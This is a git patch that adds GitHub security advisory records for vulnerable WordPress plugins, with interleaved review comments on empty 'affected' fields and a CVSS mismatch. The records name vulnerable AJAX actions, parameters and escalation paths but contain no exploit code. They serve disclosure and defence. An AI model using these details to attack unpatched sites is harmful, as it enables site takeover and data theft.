+ "details": "The PDF Invoices & Packing Slips for WooCommerce plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 5.6.0 via the `wpo_ips_edi_save_order_customer_peppol_identifiers` AJAX action due to missing capability checks and order ownership validation. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify Peppol/EDI endpoint identifiers (`peppol_endpoint_id`, `peppol_endpoint_eas`) for any customer by specifying an arbitrary `order_id` parameter on systems using Peppol invoicing. This can affect order routing on the Peppol network and may result in payment disruptions and data leakage.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1906"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/woocommerce-pdf-invoices-packing-slips/tags/5.6.0/includes/Admin.php#L72"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/woocommerce-pdf-invoices-packing-slips/tags/5.6.0/includes/Admin.php#L895"
+ },
+ {
+ "type": "WEB",
+ "url": "https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/#developers"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2e1922c6-e63b-47aa-97de-1e2382fa25d3?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-862"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T06:16:34Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-rj4g-w683-5gq4/GHSA-rj4g-w683-5gq4.json b/advisories/unreviewed/2026/02/GHSA-rj4g-w683-5gq4/GHSA-rj4g-w683-5gq4.json
new file mode 100644
index 0000000000000..1d82bf0a60c65
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-rj4g-w683-5gq4/GHSA-rj4g-w683-5gq4.json
@@ -0,0 +1,48 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-rj4g-w683-5gq4",
+ "modified": "2026-02-18T06:30:19Z",
+ "published": "2026-02-18T06:30:19Z",
+ "aliases": [
+ "CVE-2026-1925"
+ ],
+ "details": "The EmailKit – Email Customizer for WooCommerce & WP plugin for WordPress is vulnerable to unauthorized data modification due to a missing capability check on the 'update_template_data' function in all versions up to, and including, 1.6.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify the title of any post on the site, including posts, pages, and custom post types.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1925"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/emailkit/tags/1.6.2/includes/Admin/EmailKitAjax.php#L150"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/emailkit/trunk/includes/Admin/EmailKitAjax.php#L150"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset/3456972/emailkit/trunk?contextall=1&old=3419280&old_path=%2Femailkit%2Ftrunk#file1"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f131ea1e-d652-4854-abea-6a307ca8118f?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-862"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T05:16:28Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-vfcp-69jm-85xv/GHSA-vfcp-69jm-85xv.json b/advisories/unreviewed/2026/02/GHSA-vfcp-69jm-85xv/GHSA-vfcp-69jm-85xv.json
new file mode 100644
index 0000000000000..016f1de2f6a51
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-vfcp-69jm-85xv/GHSA-vfcp-69jm-85xv.json
@@ -0,0 +1,25 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-vfcp-69jm-85xv",
+ "modified": "2026-02-18T06:30:18Z",
+ "published": "2026-02-18T06:30:18Z",
+ "aliases": [
+ "CVE-2026-27034"
+ ],
+ "details": "Rejected reason: Not used",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27034"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T04:16:00Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-vrm4-h3r4-hh29/GHSA-vrm4-h3r4-hh29.json b/advisories/unreviewed/2026/02/GHSA-vrm4-h3r4-hh29/GHSA-vrm4-h3r4-hh29.json
new file mode 100644
index 0000000000000..6df91580455d2
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-vrm4-h3r4-hh29/GHSA-vrm4-h3r4-hh29.json
@@ -0,0 +1,25 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-vrm4-h3r4-hh29",
+ "modified": "2026-02-18T06:30:18Z",
+ "published": "2026-02-18T06:30:18Z",
+ "aliases": [
+ "CVE-2026-27031"
+ ],
+ "details": "Rejected reason: Not used",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27031"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T04:16:00Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-wpf3-wv8v-2wxj/GHSA-wpf3-wv8v-2wxj.json b/advisories/unreviewed/2026/02/GHSA-wpf3-wv8v-2wxj/GHSA-wpf3-wv8v-2wxj.json new file mode 100644 index 0000000000000..a6b73996ee3fd --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wpf3-wv8v-2wxj/GHSA-wpf3-wv8v-2wxj.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wpf3-wv8v-2wxj", + "modified": "2026-02-18T06:30:19Z", + "published": "2026-02-18T06:30:19Z", + "aliases": [ + "CVE-2025-12071" + ], + "details": "The Frontend User Notes plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.1.0 via the 'funp_ajax_modify_notes' AJAX endpoint due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify arbitrary notes that do not belong to them.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12071" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/frontend-user-notes/tags/2.1.1/includes/ajax.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/30f2dd33-228d-4942-88d9-78c7ed0b79a1?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-639" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T05:16:16Z" + } +} \ No newline at end of file From d6d6c974b5a7967b6140980bb26d7ef5c03f3d15 Mon Sep 17 00:00:00 2001 
From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 18 Feb 2026 09:32:25 +0000 Subject: [PATCH 002/174] Publish Advisories GHSA-34f4-7p4v-274v GHSA-53pp-j4fh-wvrr GHSA-5c5v-f747-q7rq GHSA-6mq9-qm49-w244 GHSA-77g9-fwj8-pcwg GHSA-8425-76gw-qxj4 GHSA-8vw7-m4cj-2323 GHSA-9x54-6v7m-8wf2 GHSA-cwvx-vcjx-vqjc GHSA-cxr2-7xvc-hh42 GHSA-g6wj-gw42-4345 GHSA-gch6-cfhh-c44p GHSA-gmgx-8hxg-f53q GHSA-gxvp-w433-832f GHSA-h92c-7ccr-x4hr GHSA-jh7f-pj8r-h37c GHSA-p572-g32f-hp32 GHSA-q7cc-x725-hp7g GHSA-q7wp-4j7p-g4vj GHSA-qfwf-756h-2p4g GHSA-qj9g-q4j9-47hp GHSA-rg7x-c263-823c GHSA-wxhm-86c2-x66c GHSA-xf7v-j2cc-2crf --- .../GHSA-34f4-7p4v-274v.json | 48 ++++++++++++++ .../GHSA-53pp-j4fh-wvrr.json | 48 ++++++++++++++ .../GHSA-5c5v-f747-q7rq.json | 52 +++++++++++++++ .../GHSA-6mq9-qm49-w244.json | 56 ++++++++++++++++ .../GHSA-77g9-fwj8-pcwg.json | 48 ++++++++++++++ .../GHSA-8425-76gw-qxj4.json | 48 ++++++++++++++ .../GHSA-8vw7-m4cj-2323.json | 60 +++++++++++++++++ .../GHSA-9x54-6v7m-8wf2.json | 25 ++++++++ .../GHSA-cwvx-vcjx-vqjc.json | 48 ++++++++++++++ .../GHSA-cxr2-7xvc-hh42.json | 52 +++++++++++++++ .../GHSA-g6wj-gw42-4345.json | 48 ++++++++++++++ .../GHSA-gch6-cfhh-c44p.json | 48 ++++++++++++++ .../GHSA-gmgx-8hxg-f53q.json | 52 +++++++++++++++ .../GHSA-gxvp-w433-832f.json | 52 +++++++++++++++ .../GHSA-h92c-7ccr-x4hr.json | 52 +++++++++++++++ .../GHSA-jh7f-pj8r-h37c.json | 56 ++++++++++++++++ .../GHSA-p572-g32f-hp32.json | 56 ++++++++++++++++ .../GHSA-q7cc-x725-hp7g.json | 48 ++++++++++++++ .../GHSA-q7wp-4j7p-g4vj.json | 48 ++++++++++++++ .../GHSA-qfwf-756h-2p4g.json | 60 +++++++++++++++++ .../GHSA-qj9g-q4j9-47hp.json | 52 +++++++++++++++ .../GHSA-rg7x-c263-823c.json | 56 ++++++++++++++++ .../GHSA-wxhm-86c2-x66c.json | 44 +++++++++++++ .../GHSA-xf7v-j2cc-2crf.json | 64 +++++++++++++++++++ 24 files changed, 1221 insertions(+) create mode 100644 advisories/unreviewed/2026/02/GHSA-34f4-7p4v-274v/GHSA-34f4-7p4v-274v.json create mode 100644 
advisories/unreviewed/2026/02/GHSA-53pp-j4fh-wvrr/GHSA-53pp-j4fh-wvrr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-5c5v-f747-q7rq/GHSA-5c5v-f747-q7rq.json create mode 100644 advisories/unreviewed/2026/02/GHSA-6mq9-qm49-w244/GHSA-6mq9-qm49-w244.json create mode 100644 advisories/unreviewed/2026/02/GHSA-77g9-fwj8-pcwg/GHSA-77g9-fwj8-pcwg.json create mode 100644 advisories/unreviewed/2026/02/GHSA-8425-76gw-qxj4/GHSA-8425-76gw-qxj4.json create mode 100644 advisories/unreviewed/2026/02/GHSA-8vw7-m4cj-2323/GHSA-8vw7-m4cj-2323.json create mode 100644 advisories/unreviewed/2026/02/GHSA-9x54-6v7m-8wf2/GHSA-9x54-6v7m-8wf2.json create mode 100644 advisories/unreviewed/2026/02/GHSA-cwvx-vcjx-vqjc/GHSA-cwvx-vcjx-vqjc.json create mode 100644 advisories/unreviewed/2026/02/GHSA-cxr2-7xvc-hh42/GHSA-cxr2-7xvc-hh42.json create mode 100644 advisories/unreviewed/2026/02/GHSA-g6wj-gw42-4345/GHSA-g6wj-gw42-4345.json create mode 100644 advisories/unreviewed/2026/02/GHSA-gch6-cfhh-c44p/GHSA-gch6-cfhh-c44p.json create mode 100644 advisories/unreviewed/2026/02/GHSA-gmgx-8hxg-f53q/GHSA-gmgx-8hxg-f53q.json create mode 100644 advisories/unreviewed/2026/02/GHSA-gxvp-w433-832f/GHSA-gxvp-w433-832f.json create mode 100644 advisories/unreviewed/2026/02/GHSA-h92c-7ccr-x4hr/GHSA-h92c-7ccr-x4hr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-jh7f-pj8r-h37c/GHSA-jh7f-pj8r-h37c.json create mode 100644 advisories/unreviewed/2026/02/GHSA-p572-g32f-hp32/GHSA-p572-g32f-hp32.json create mode 100644 advisories/unreviewed/2026/02/GHSA-q7cc-x725-hp7g/GHSA-q7cc-x725-hp7g.json create mode 100644 advisories/unreviewed/2026/02/GHSA-q7wp-4j7p-g4vj/GHSA-q7wp-4j7p-g4vj.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qfwf-756h-2p4g/GHSA-qfwf-756h-2p4g.json create mode 100644 advisories/unreviewed/2026/02/GHSA-qj9g-q4j9-47hp/GHSA-qj9g-q4j9-47hp.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rg7x-c263-823c/GHSA-rg7x-c263-823c.json create mode 100644 
advisories/unreviewed/2026/02/GHSA-wxhm-86c2-x66c/GHSA-wxhm-86c2-x66c.json create mode 100644 advisories/unreviewed/2026/02/GHSA-xf7v-j2cc-2crf/GHSA-xf7v-j2cc-2crf.json diff --git a/advisories/unreviewed/2026/02/GHSA-34f4-7p4v-274v/GHSA-34f4-7p4v-274v.json b/advisories/unreviewed/2026/02/GHSA-34f4-7p4v-274v/GHSA-34f4-7p4v-274v.json new file mode 100644 index 0000000000000..d73bd87cbad3d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-34f4-7p4v-274v/GHSA-34f4-7p4v-274v.json 
@@ -0,0 +1,48 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-34f4-7p4v-274v",
+ "modified": "2026-02-18T09:31:04Z",
+ "published": "2026-02-18T09:31:04Z",
+ "aliases": [
+ "CVE-2026-2281"
+ ],
+ "details": "The Private Comment plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Label text' setting in all versions up to, and including, 0.0.4. This is due to insufficient input sanitization and output escaping on the plugin's label text option. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2281"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/private-comment/tags/0.0.3/private-comment.php#L128"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/private-comment/trunk/private-comment.php#L128"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset/3458294/private-comment/trunk/private-comment.php"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/94d75f18-67ab-4367-982b-73e256d5dbe2?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T07:16:10Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-53pp-j4fh-wvrr/GHSA-53pp-j4fh-wvrr.json b/advisories/unreviewed/2026/02/GHSA-53pp-j4fh-wvrr/GHSA-53pp-j4fh-wvrr.json
new file mode 100644
index 0000000000000..65896427e7875
--- /dev/null
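Review bot: `"affected": []` leaves this record without a package or version range, although `details` states the bound in prose (all versions up to, and including, 0.0.4). Tooling that matches on `affected` will not flag installations of the plugin, and the same holds for every record added in this patch. A populated entry would name the plugin as the package and close the range with `"last_affected": "0.0.4"`; which ecosystem value applies to WordPress plugins is not visible here. If the empty array is intended for unreviewed entries, consumers have to match these records on `aliases` or the plugin name instead.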
+++ b/advisories/unreviewed/2026/02/GHSA-53pp-j4fh-wvrr/GHSA-53pp-j4fh-wvrr.json
@@ -0,0 +1,48 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-53pp-j4fh-wvrr",
+ "modified": "2026-02-18T09:31:04Z",
+ "published": "2026-02-18T09:31:04Z",
+ "aliases": [
+ "CVE-2026-1656"
+ ],
+ "details": "The Business Directory Plugin for WordPress is vulnerable to authorization bypass due to a missing authorization check in all versions up to, and including, 6.4.20. This makes it possible for unauthenticated attackers to modify arbitrary listings, including changing titles, content, and email addresses, by directly referencing the listing ID in crafted requests to the wpbdp_ajax AJAX action.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1656"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/business-directory-plugin/tags/6.4.20/includes/helpers/class-authenticated-listing-view.php#L20"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/business-directory-plugin/trunk/includes/helpers/class-authenticated-listing-view.php#L20"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset/3452627/business-directory-plugin/tags/6.4.21/includes/controllers/pages/class-submit-listing.php"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f894ce75-168c-4baa-8cae-d2e7f1a0a9ab?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-862"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T09:15:58Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-5c5v-f747-q7rq/GHSA-5c5v-f747-q7rq.json b/advisories/unreviewed/2026/02/GHSA-5c5v-f747-q7rq/GHSA-5c5v-f747-q7rq.json
new file mode 100644
index 0000000000000..e5228cf404a20
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-5c5v-f747-q7rq/GHSA-5c5v-f747-q7rq.json
@@ -0,0 +1,52 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-5c5v-f747-q7rq",
+ "modified": "2026-02-18T09:31:03Z",
+ "published": "2026-02-18T09:31:03Z",
+ "aliases": [
+ "CVE-2026-1666"
+ ],
+ "details": "The Download Manager plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'redirect_to' parameter in all versions up to, and including, 3.3.46. This is due to insufficient input sanitization and output escaping on the 'redirect_to' GET parameter in the login form shortcode. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1666"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/download-manager/tags/3.3.46/src/User/Login.php#L137"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/download-manager/tags/3.3.46/src/User/views/login-form.php#L142"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3455081%40download-manager%2Ftrunk&old=3440008%40download-manager%2Ftrunk&sfp_email=&sfph_mail=#file25"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/3cb84ba3-b403-4a9d-b1a7-92aa947310ac?source=cve"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wpdownloadmanager.com/doc/short-codes/wpdm_login_form-user-login-form-short-code"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T07:16:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-6mq9-qm49-w244/GHSA-6mq9-qm49-w244.json b/advisories/unreviewed/2026/02/GHSA-6mq9-qm49-w244/GHSA-6mq9-qm49-w244.json
new file mode 100644
index 0000000000000..7aef7673f85d8
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-6mq9-qm49-w244/GHSA-6mq9-qm49-w244.json
@@ -0,0 +1,56 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-6mq9-qm49-w244",
+ "modified": "2026-02-18T09:31:04Z",
+ "published": "2026-02-18T09:31:04Z",
+ "aliases": [
+ "CVE-2026-2127"
+ ],
+ "details": "The SiteOrigin Widgets Bundle plugin for WordPress is vulnerable to unauthorized arbitrary shortcode execution in all versions up to, and including, 1.70.4. This is due to a missing capability check on the `siteorigin_widget_preview_widget_action()` function which is registered via the `wp_ajax_so_widgets_preview` AJAX action. The function only verifies a nonce (`widgets_action`) but does not check user capabilities. This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute arbitrary shortcodes by invoking the `SiteOrigin_Widget_Editor_Widget` via the preview endpoint. The required nonce is exposed on the public frontend when the Post Carousel widget is present on a page, embedded in the `data-ajax-url` HTML attribute.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2127"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/so-widgets-bundle/tags/1.70.4/base/inc/actions.php#L6"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/so-widgets-bundle/tags/1.70.4/base/inc/actions.php#L75"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/so-widgets-bundle/tags/1.70.4/widgets/editor/editor.php#L120"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/so-widgets-bundle/tags/1.70.4/widgets/post-carousel/post-carousel.php#L590"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3460939%40so-widgets-bundle%2Ftrunk&old=3434183%40so-widgets-bundle%2Ftrunk&sfp_email=&sfph_mail="
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/bf92c64b-ca76-4af7-a1e4-585a60b03153?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-862"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T09:15:58Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-77g9-fwj8-pcwg/GHSA-77g9-fwj8-pcwg.json b/advisories/unreviewed/2026/02/GHSA-77g9-fwj8-pcwg/GHSA-77g9-fwj8-pcwg.json
new file mode 100644
index 0000000000000..e0d470e5fbab3
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-77g9-fwj8-pcwg/GHSA-77g9-fwj8-pcwg.json
@@ -0,0 +1,48 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-77g9-fwj8-pcwg",
+ "modified": "2026-02-18T09:31:04Z",
+ "published": "2026-02-18T09:31:04Z",
+ "aliases": [
+ "CVE-2026-1937"
+ ],
+ "details": "The YayMail – WooCommerce Email Customizer plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the `yaymail_import_state` AJAX action in all versions up to, and including, 4.3.2. This makes it possible for authenticated attackers, with Shop Manager-level access and above, to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1937"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/yaymail/tags/4.3.2/src/Models/MigrationModel.php#L143"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/yaymail/trunk/src/Models/MigrationModel.php#L143"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3460087%40yaymail&new=3460087%40yaymail&sfp_email=&sfph_mail="
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/5a17ded3-340d-494f-be7e-2550dab360bc?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-862"
+ ],
+ "severity": "CRITICAL",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T07:16:10Z"
+ }
+}
\ No newline at end of file
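Review bot: The vector in `severity[0].score` carries `PR:N`, but `details` says the `yaymail_import_state` action is reachable only by authenticated attackers with Shop Manager-level access and above, so `"severity": "CRITICAL"` rests on a precondition the description contradicts. GHSA-g6wj-gw42-4345 later in this patch has the same mismatch (`PR:N` against a Shop Manager requirement). Both values presumably come unchanged from the upstream CNA record and should be checked against it before they drive patch priority; a vector matching the text would read `PR:H`, as the sibling record GHSA-gxvp-w433-832f does for the same role. The described impact, arbitrary option updates leading to administrator registration, still calls for prompt patching of affected sites whatever the corrected score turns out to be.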
diff --git a/advisories/unreviewed/2026/02/GHSA-8425-76gw-qxj4/GHSA-8425-76gw-qxj4.json b/advisories/unreviewed/2026/02/GHSA-8425-76gw-qxj4/GHSA-8425-76gw-qxj4.json
new file mode 100644
index 0000000000000..99a3c7283332e
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-8425-76gw-qxj4/GHSA-8425-76gw-qxj4.json
@@ -0,0 +1,48 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-8425-76gw-qxj4",
+ "modified": "2026-02-18T09:31:03Z",
+ "published": "2026-02-18T09:31:03Z",
+ "aliases": [
+ "CVE-2026-1857"
+ ],
+ "details": "The Gutenberg Blocks with AI by Kadence WP plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 3.6.1. This is due to insufficient validation of the `endpoint` parameter in the `get_items()` function of the GetResponse REST API handler. The endpoint's permission check only requires `edit_posts` capability (Contributor role) rather than `manage_options` (Administrator). This makes it possible for authenticated attackers, with Contributor-level access and above, to make server-side requests to arbitrary endpoints on the configured GetResponse API server, retrieving sensitive data such as contacts, campaigns, and mailing lists using the site's stored API credentials. The stored API key is also leaked in the request headers.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1857"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/kadence-blocks/tags/3.5.32/includes/advanced-form/getresponse-rest-api.php#L57"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/kadence-blocks/tags/3.5.32/includes/advanced-form/getresponse-rest-api.php#L77"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3454881%40kadence-blocks%2Ftrunk&old=3453204%40kadence-blocks%2Ftrunk&sfp_email=&sfph_mail="
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2ea8d38a-f5ce-40dd-a015-f56d60579e05?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-918"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T07:16:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-8vw7-m4cj-2323/GHSA-8vw7-m4cj-2323.json b/advisories/unreviewed/2026/02/GHSA-8vw7-m4cj-2323/GHSA-8vw7-m4cj-2323.json
new file mode 100644
index 0000000000000..5d13751701bc9
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-8vw7-m4cj-2323/GHSA-8vw7-m4cj-2323.json
@@ -0,0 +1,60 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-8vw7-m4cj-2323",
+ "modified": "2026-02-18T09:31:04Z",
+ "published": "2026-02-18T09:31:04Z",
+ "aliases": [
+ "CVE-2026-2642"
+ ],
